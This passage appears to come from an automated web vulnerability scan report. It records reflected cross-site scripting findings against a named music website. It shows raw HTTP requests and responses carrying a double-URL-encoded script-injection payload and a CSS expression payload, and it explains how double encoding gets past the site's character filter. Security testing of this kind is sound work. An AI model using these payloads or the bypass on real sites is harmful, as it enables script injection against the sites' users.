Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:35 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88067


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
lhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bphf';
   s.prop4 = 'resdb736';b0de1f819';
   s.prop5 = 'js';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 + '
...[SNIP]...

2.201. http://bigpondmusic.com/bphf/res/js/bphf_menu.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/bphf_menu.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7016f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e331eb61f116 was submitted in the REST URL parameter 3. This input was echoed as 7016f"><script>alert(1)</script>331eb61f116 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphf/res/js7016f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e331eb61f116/bphf_menu.js HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88087


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphf/res/js7016f"><script>alert(1)</script>331eb61f116/bphf_menu.js" />
...[SNIP]...

2.202. http://bigpondmusic.com/bphf/res/js/bphf_menu.js [REST URL parameter 3]  previous  next

Summary

Severity:   High